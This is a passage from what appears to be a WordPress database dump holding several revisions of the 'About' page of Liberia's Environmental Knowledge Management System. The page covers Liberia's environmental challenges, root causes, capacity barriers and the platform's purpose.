b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4><p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations.  More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004).  From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p><h4>A2. Capacity Barriers</h4><p>Liberia has undertaken numerous initiatives to address environmental issues.  Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals.  As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors.   Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions.  The NCSA identified the following barriers that cut across the three Rio Conventions:</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:27:33','2019-11-12 11:27:33','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1948,1,'2019-11-12 11:30:27','2019-11-12 11:30:27','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>Poor governance</li>\n</ul>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:30:27','2019-11-12 11:30:27','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1949,1,'2019-11-12 11:37:33','2019-11-12 11:37:33','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:37:33','2019-11-12 11:37:33','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1950,1,'2019-11-12 11:39:46','2019-11-12 11:39:46','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>• Weak technical, administrative and managerial capacities; • Weak institutional coordination; • Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels; • Limited stakeholder participation in planning and decision-making processes; • Limited dissemination of key information (Republic of Liberia, 2013). Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:39:46','2019-11-12 11:39:46','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1952,1,'2019-11-12 11:44:37','2019-11-12 11:44:37','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making 